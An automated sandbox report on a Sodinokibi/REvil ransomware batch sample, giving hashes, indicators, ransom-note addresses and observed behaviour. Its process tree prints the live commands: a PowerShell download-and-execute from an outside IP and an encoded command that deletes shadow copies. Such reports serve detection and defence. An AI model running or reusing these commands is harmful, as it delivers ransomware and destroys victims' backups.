Analysis
-
max time kernel
143s -
max time network
133s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
04-03-2020 16:10
Static task
static1
Behavioral task
behavioral1
Sample
UJvbivju.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
UJvbivju.bat
Resource
win10v200217
General
-
Target
UJvbivju.bat
-
Size
189B
-
MD5
30e9f006bd27f61b87649fb861b70525
-
SHA1
602c170aa87ed68a7c5f68f15a162bdbd51dfc1f
-
SHA256
c27c8d9ea31e707420a5f77581ead62b943e9195989ff1d5df30d0ecafefe2e6
-
SHA512
f9c62d8bff196da519b3c336d079781f33cdd0123f910448d9b8be41b732b149dbbed44e1bdb58ebf67d914ae4ec0d376ac16688851ea6714a21cf638a6cd7ae
Malware Config
Extracted
http://185.103.242.78/pastes/UJvbivju
Extracted
C:\7dx1t04r65-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F6228642C93D0AF2
http://decryptor.cc/F6228642C93D0AF2
Signatures
-
Discovering connected drives 3 TTPs 7 IoCs
Processes:
cmd.exepowershell.exepowershell.exedescription ioc process File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\E: powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\736utrh656.bmp" powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1828 wrote to memory of 1852 1828 cmd.exe powershell.exe PID 1852 wrote to memory of 1956 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1956 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1956 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1956 1852 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 1956 powershell.exe 1956 powershell.exe -
Blacklisted process makes network request 82 IoCs
Processes:
powershell.exeflow pid process 3 1852 powershell.exe 5 1852 powershell.exe 7 1852 powershell.exe 9 1852 powershell.exe 11 1852 powershell.exe 12 1852 powershell.exe 14 1852 powershell.exe 15 1852 powershell.exe 17 1852 powershell.exe 18 1852 powershell.exe 20 1852 powershell.exe 22 1852 powershell.exe 24 1852 powershell.exe 25 1852 powershell.exe 27 1852 powershell.exe 28 1852 powershell.exe 31 1852 powershell.exe 32 1852 powershell.exe 34 1852 powershell.exe 36 1852 powershell.exe 37 1852 powershell.exe 39 1852 powershell.exe 41 1852 powershell.exe 43 1852 powershell.exe 45 1852 powershell.exe 47 1852 powershell.exe 50 1852 powershell.exe 51 1852 powershell.exe 53 1852 powershell.exe 55 1852 powershell.exe 58 1852 powershell.exe 59 1852 powershell.exe 61 1852 powershell.exe 63 1852 powershell.exe 65 1852 powershell.exe 67 1852 powershell.exe 69 1852 powershell.exe 71 1852 powershell.exe 73 1852 powershell.exe 75 1852 powershell.exe 76 1852 powershell.exe 78 1852 powershell.exe 80 1852 powershell.exe 82 1852 powershell.exe 84 1852 powershell.exe 86 1852 powershell.exe 88 1852 powershell.exe 90 1852 powershell.exe 92 1852 powershell.exe 93 1852 powershell.exe 95 1852 powershell.exe 96 1852 powershell.exe 98 1852 powershell.exe 100 1852 powershell.exe 101 1852 powershell.exe 103 1852 powershell.exe 104 1852 powershell.exe 106 1852 powershell.exe 111 1852 powershell.exe 113 1852 powershell.exe 115 1852 powershell.exe 118 1852 powershell.exe 120 1852 powershell.exe 122 1852 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\7dx1t04r65-readme.txt powershell.exe File renamed C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.7dx1t04r65 powershell.exe File renamed C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe File renamed C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File created \??\c:\program files\microsoft sql server compact edition\7dx1t04r65-readme.txt powershell.exe File renamed C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.7dx1t04r65 powershell.exe File renamed C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.7dx1t04r65 powershell.exe File created \??\c:\program files\7dx1t04r65-readme.txt powershell.exe File renamed C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File renamed C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File renamed C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.7dx1t04r65 powershell.exe File renamed C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.7dx1t04r65 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7dx1t04r65-readme.txt powershell.exe File renamed C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.7dx1t04r65 powershell.exe File renamed C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.7dx1t04r65 powershell.exe File renamed C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File renamed C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.7dx1t04r65 powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File renamed C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.7dx1t04r65 powershell.exe File created \??\c:\program files (x86)\7dx1t04r65-readme.txt powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeBackupPrivilege 1352 vssvc.exe Token: SeRestorePrivilege 1352 vssvc.exe Token: SeAuditPrivilege 1352 vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\UJvbivju.bat"1⤵
- Discovering connected drives
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/UJvbivju');Invoke-QGTRJX;Start-Sleep -s 10000"2⤵
- Discovering connected drives
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Discovering connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1352